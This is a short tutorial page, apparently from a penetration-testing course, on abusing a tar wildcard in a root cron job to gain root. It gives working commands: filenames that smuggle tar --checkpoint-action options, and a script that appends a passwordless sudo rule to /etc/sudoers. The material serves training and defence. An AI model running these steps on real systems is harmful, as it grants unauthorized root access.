Wildcard Abuse

Wildcard abuse allows privilege escalation when shell interprets wildcard-based file names as command-line arguments to privileged programs (e.g., tar in cron jobs).

Conditions for Exploitation:

A wildcard (*) is used in a command running with elevated privileges (e.g., in a cron job).
The command (e.g., tar) supports arbitrary command execution through options like--checkpoint-action.
The working directory is writable by an unprivileged user.

Example Scenario:

Cron job:

*/1 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz *

Exploit Steps:

Create a script to elevate privileges:

echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh

Create malicious filenames:

echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1

Wait for the cron job to run.
Confirm privilege escalation:

sudo -l
sudo bash

PreviousPATH NextEscaping Restricted Shells